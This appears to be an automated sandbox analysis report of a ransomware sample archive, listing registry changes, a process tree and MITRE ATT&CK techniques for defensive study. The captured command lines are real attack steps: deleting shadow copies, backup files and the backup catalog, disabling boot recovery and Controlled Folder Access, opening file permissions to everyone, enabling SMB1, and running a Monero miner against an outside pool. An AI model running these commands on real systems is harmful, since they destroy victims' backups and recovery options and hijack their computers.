description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00435.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4740
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4384 -
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2272 -
C:\WINDOWS\System32\nslookup.exeC:\WINDOWS\System32\nslookup.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.2miners.com:2222 --user=46dBBki3MyQ36pHViG2pJtci9HiEaTaPx75YK8eH8nqhLseWa1zWtKACNKz4tvMtBkfFpwy4grhSjL83GV24qadmE33huf2 --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=80 --unam-stealth5⤵PID:2864
-
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 19044⤵
- Program crash
PID:1804
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- System policy modification
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mohn5h45\mohn5h45.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:6296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3B2.tmp" "c:\Users\Admin\AppData\Local\Temp\mohn5h45\CSC723DC7E5A15C4DC0BDF878C0605AD31A.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:3280
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:6632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk4⤵
- System Location Discovery: System Language Discovery
PID:5408
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-CimInstance Win32_ShadowCopy | Remove-CimInstance4⤵
- System Location Discovery: System Language Discovery
PID:6612
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6556
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4860
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config MBAMService start= disabled4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵
- System Location Discovery: System Language Discovery
PID:6624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6716
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config fdPHost start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6320
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:288
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:7028
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="Network Discovery" new enable=Yes4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5908
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\netsh.exe" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Executes dropped EXE
PID:2832
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol4⤵
- Executes dropped EXE
PID:4464
-
-
C:\Windows\SysWOW64\mountvol.exe"mountvol.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6244
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" A: \\?\Volume{0576a638-0000-0000-0000-100000000000}\4⤵
- Executes dropped EXE
PID:652
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" B: \\?\Volume{0576a638-0000-0000-0000-d01200000000}\4⤵
- Executes dropped EXE
PID:4740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" E: \\?\Volume{0576a638-0000-0000-0000-f0ff3a000000}\4⤵
- Executes dropped EXE
PID:6724
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\mountvol.exe" G: \\?\Volume{a31980c4-84ce-11ef-af16-806e6f6e6963}\4⤵
- Executes dropped EXE
PID:2600
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "C:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:2852
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:6524
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Windows\System32\icacls.exe" "D:*" /grant Everyone:F /T /C /Q4⤵
- Executes dropped EXE
PID:5580
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a4⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:6424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" view4⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:1496
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe3⤵
- Executes dropped EXE
PID:3156
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 18124⤵
- Program crash
PID:1896
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3772 -s 4804⤵
- Program crash
PID:536
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exeHEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\Desktop\00435\test.exe"C:\Users\Admin\Desktop\00435\test.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:244
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exeHEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3684
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6980
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:6796
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:6824
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:6856
-
-
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exeHEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exeHEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ecc3850c-a3f1-4e9f-bf3e-e16dac3f83c4" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6048
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe"C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe"C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5844
-
-
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exeTrojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe3⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Disables RegEdit via registry modification
- Drops startup file
- Executes dropped EXE
- Modifies system executable filetype association
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3548 -
C:\Windows\xk.exeC:\Windows\xk.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5916
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5468
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6276
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5248
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6668
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5404
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6200
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵
- Executes dropped EXE
PID:5220
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵
- Executes dropped EXE
PID:1332
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵
- Executes dropped EXE
PID:6368
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵
- Executes dropped EXE
PID:5400
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵
- Executes dropped EXE
PID:5252
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵
- Executes dropped EXE
PID:6396
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵
- Executes dropped EXE
PID:6064
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exeTrojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 4084⤵
- Program crash
PID:4936
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exeTrojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im Windowsecurity.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\PI-2.jpg4⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exeTrojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3160 -
C:\Users\Admin\AppData\Roaming\MediaFoundation.exe"C:\Users\Admin\AppData\Roaming\MediaFoundation.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5680
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exeTrojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6012 -
C:\Users\Admin\AppData\Local\Temp\huter.exe"C:\Users\Admin\AppData\Local\Temp\huter.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:1392
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exeTrojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6236
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3772 -ip 37721⤵PID:2304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1840 -ip 18401⤵PID:440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 540 -ip 5401⤵PID:4344
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4312 -ip 43121⤵PID:5760
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6924
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7044
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5504
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:5388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:6428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵PID:3960
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2344
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:6464
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4060
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:6188
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3676
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:6944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:4464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:5168
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Indicator Removal
3File Deletion
3Modify Registry
